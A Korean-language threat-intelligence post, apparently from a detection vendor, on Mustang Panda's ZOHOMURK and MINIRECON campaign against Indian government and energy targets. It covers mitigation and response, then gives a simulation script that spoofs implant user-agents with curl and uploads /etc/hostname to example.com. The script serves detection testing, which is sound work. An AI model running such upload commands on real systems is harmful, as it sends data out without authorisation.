SOC Prime Bias: 높음

06 Jul 2026 21:57 UTC

무스탕 판다가 인도 정부 및 에너지 부문을 대상으로 ZOHOMURK 및 MINIRECON 사용

Author Photo
SOC Prime Team linkedin icon 팔로우
무스탕 판다가 인도 정부 및 에너지 부문을 대상으로 ZOHOMURK 및 MINIRECON 사용
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

요약

Mustang Panda는 인도 정부와 수력 발전 부문을 대상으로 한 첩보 작전을 수행하고 있습니다. 이 그룹은 SHARDLOADER, MINIRECON, ZOHOMURK를 포함한 업데이트된 멀웨어 툴킷을 사용하고 있습니다. 주목할 만한 기술 중 하나는 Zoho WorkDrive를 통제 및 데이터 유출에 악용하는 것입니다.

조사

Acronis TRU는 인도-대만 협력을 주제로 한 스피어피싱 미끼를 사용한 두 개의 병행된 캠페인을 확인했습니다. 연구자들은 정품 Solid PDF Creator 바이너리를 통한 DLL 사이드로딩을 발견하고 새로운 ZOHOMURK 및 MINIRECON 임플란트를 분석했습니다. 이 조사는 방어 행동을 지원하기 위해 CERT-In과도 협력하여 수행되었습니다.

완화

조직은 클라우드 플랫폼과 관련된 비정상적인 활동, 특히 Zoho WorkDrive의 무단 사용을 모니터링해야 합니다. EDR 및 XDR 솔루션은 DLL 사이드로딩 및 의심스러운 레지스트리 기반 지속성을 탐지하도록 조정되어야 합니다. 클라우드 서비스에 HTTPS 또는 WebSocket 연결을 시도하는 브라우저 외의 프로세스에 대한 가시성도 필수적입니다.

대응

이 활동이 탐지되면, 클라우드 API를 통한 추가 유출을 차단하기 위해 영향을 받은 시스템을 즉시 격리해야 합니다. 조사관들은 다음과 같은 스테이징 경로에 대한 포렌식 분석을 수행해야 합니다 C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. 레지스트리 실행 키 및 예약된 작업도 무단 지속성 여부를 검토해야 합니다.

공격 흐름

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준선 사전 점검 통과 필수.

이유: 이 섹션은 탐지 규칙을 촉발하도록 설계된 상대 기법(TTP)의 정확한 실행을 상세히 설명합니다. 명령어와 내러티브는 반드시 식별된 TTP를 직접 반영하고, 탐지 논리에 의해 예상되는 정확한 텔레메트리를 생성하는 것을 목표로 해야 합니다. 추상적이거나 관련 없는 예는 오진으로 이어질 것입니다.

  • 공격 내러티브 및 명령어: 적은 성공적으로 발판을 마련하고 지휘 및 통제(C2) 통신을 시작하려고 시도하고 있습니다. 합법적인 비즈니스 트래픽으로 위장하기 위해, ZOHOMURK 임플란트는 Zoho WorkDrive API 호출을 모방하여 컨트롤러와 통신을 시도합니다. 공격자는 특정한 하드코딩된 User-Agent 문자열 (Zoho Client/1.0)을 사용하여 일부 네트워크 필터를 우회하고, 합법적인 클라우드 생산성 트래픽과 섞이기를 희망합니다. 이 작업은 목표 User-Agent를 포함하는 프록시 로그 항목을 생성하여 탐지 규칙을 촉발시킬 것입니다.

  • 회귀 테스트 스크립트:

    #!/bin/bash
    # User-Agent 스푸핑을 통한 ZOHOMURK C2 시뮬레이션
    # 목표 1: Zoho Client 모방
    echo "[+] ZOHOMURK 시뮬레이션: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # 목표 2: IPFetcher 모방
    echo "[+] ZOHOMURK 시뮬레이션: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # 목표 3: Multipart POST User-Agent 모방
    echo "[+] ZOHOMURK 시뮬레이션: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • 정리 명령어:

    # 이 네트워크 기반 시뮬레이션에 의해 시스템상에 지속적인 아티팩트는 생성되지 않습니다.
    # 단순히 백그라운드에서 실행 중인 curl 프로세스가 없는지 확인합니다.
    pkill curl